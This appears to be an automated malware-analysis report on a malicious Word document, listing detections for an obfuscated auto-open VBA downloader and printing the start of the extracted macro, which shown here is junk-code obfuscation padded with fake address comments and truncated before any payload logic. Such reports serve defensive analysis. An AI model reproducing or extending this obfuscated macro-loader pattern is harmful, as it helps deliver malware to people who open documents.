MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER and OLE_VBA_PCODE_AUTOEXEC_EXEC. The presence of an AutoOpen macro suggests it executes automatically upon opening. The primary function of the VBA script appears to be downloading and executing a second-stage payload, as implied by the loader heuristic and the ClamAV detection name 'Doc.Downloader.Generic'.
Heuristics 8
-
ClamAV: Doc.Downloader.Generic-7329563-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-7329563-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 82616 bytes |
SHA-256: 998f55889a8e7803af82b8a86927a4f85b7ca2cfa8f4d4772896372680ac634b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "c8033202417"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "x010864xb3461, 0, 0, MSForms, TextBox"
Attribute VB_Control = "ccc09596785, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0005x0ccc4cc, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc763509187, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x200b4c80x0, 4, 4, MSForms, TextBox"
Attribute VB_Control = "x5x3740407990, 5, 5, MSForms, TextBox"
Attribute VB_Name = "xc10x070b66c4"
Function x090c0c0x008()
On Error Resume Next
'Lead7779 Bradtke Rue, Nienowmouth, Burundi Future1557 Dylan Gardens, Walterville, Slovenia
bb018030904 = Rnd(cc21008803x60 * ChrB(527)) + Log(967)
'Regional29885 Kautzer Streets, Mohrmouth, Nicaragua Internal644 Macie Bypass, Cadeland, Kuwait
c80x700049xb2 = Rnd(b5190x65x4c89 * ChrB(254)) + Log(670)
'Forward39672 Katelynn Ways, Toreyburgh, Russian Federation Legacy7408 Mosciski Valleys, Oramouth, Haiti
c9070b0440030 = Rnd(c4000631c94c0 * ChrB(976)) + Log(310)
'Internal17326 Rice Crescent, New Connermouth, Macedonia National044 Prohaska Square, Beverlyberg, Bangladesh
x2x5x3c9006b = Rnd(c870b60800435 * ChrB(433)) + Log(345)
'Product39911 Mertz Squares, Alexysborough, Cocos (Keeling) Islands Senior58086 Roel Mills, West Queenberg, Christmas Island
b010069355888 = Rnd(x5642b019b8 * ChrB(524)) + Log(225)
'Lead5042 Deshaun Lake, Eunaport, Malta National3635 Kautzer Branch, Douglasville, Saudi Arabia
xb9050202302 = Rnd(x540b68700b * ChrB(762)) + Log(943)
'Chief154 Nathaniel Bridge, Port Lucio, Virgin Islands, British Corporate5506 Dibbert Glens, West Daryl, Thailand
c968201130010 = Rnd(xc0bb989217 * ChrB(720)) + Log(342)
'Regional71624 Amiya Forge, Joaquinbury, Saint Helena Future576 Bauch Creek, Sylviafurt, Eritrea
'Human7030 Lang Crest, Huelsberg, American Samoa District7744 Schaefer Coves, Cletamouth, Syrian Arab Republic
bc00bb7c08540 = Rnd(c8827370x02xx * ChrB(485)) + Log(51)
'Legacy2577 Kylie Locks, West Leonorchester, Ukraine Senior4201 Bruen Course, Jermaineville, Pakistan
b904810xb92 = Rnd(b29c80x7626 * ChrB(658)) + Log(447)
'Lead94788 Susanna Forks, Trantowmouth, Romania Global3246 Randy Key, Gradyberg, Niger
b000b7c6c9864 = Rnd(b67323202b3b0 * ChrB(766)) + Log(177)
'Lead579 Ruthe Springs, Jaidatown, Niger National447 Cristian Ville, South Felicitaburgh, Namibia
b1x90x1379093 = Rnd(b131009cc7b * ChrB(702)) + Log(92)
'Chief777 Wilfred River, Padbergtown, Saint Lucia Corporate7064 McKenzie Squares, South Erich, Rwanda
c95101246890 = Rnd(c82801c5c09 * ChrB(262)) + Log(132)
'Corporate16825 Rippin Parkways, West Sammy, Nigeria Internal722 Clotilde Greens, Lueilwitzmouth, Micronesia
cx0c00880190c = Rnd(x674699600b04 * ChrB(260)) + Log(966)
'National6373 O'Hara Vista, Koelpinstad, Mauritius Human37263 Jeanne Trail, South Granttown, Senegal
c5b163860097 = Rnd(b000527c312x * ChrB(912)) + Log(931)
'Dynamic79832 Gorczany Junctions, North Prince, Russian Federation International706 Breitenberg Wall, South Christyfort, Djibouti
'Global74024 Velva Ranch, West Durward, Burundi Dynamic575 Shaina Port, Schowalterside, Bouvet Island (Bouvetoya)
b0004c0b0856 = Rnd(c27059cb9003 * ChrB(857)) + Log(337)
'Regional380 Vincent Roads, Cassinland, Western Sahara Product4900 Monroe Rest, Predovicshire, Mongolia
xcb08424x399b = Rnd(x8007801x67 * ChrB(318)) + Log(303)
'Principal606 Burnice Springs, Dustinbury, Mexico Principal8392 Larissa Islands, East Billieview, Colombia
x0cb3x07680 = Rnd(x1210790820 * ChrB(574)) + Log(329)
'National302 Abshire Crescent, Port Filiberto, Guadeloupe Future463 Elyssa Cove, Faheyborough, Bahamas
xc0x2bx01x1 = Rnd(x5860x054000 * ChrB(282)) + Log(281)
'Future3462 Feeney Burg, Olliebury, Japan Dynamic5093 Moore Branch, Torphyshire, United States of America
c57927c908530 = Rnd(x1x63611c20 * ChrB(368)) + Log(792)
'Custome
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.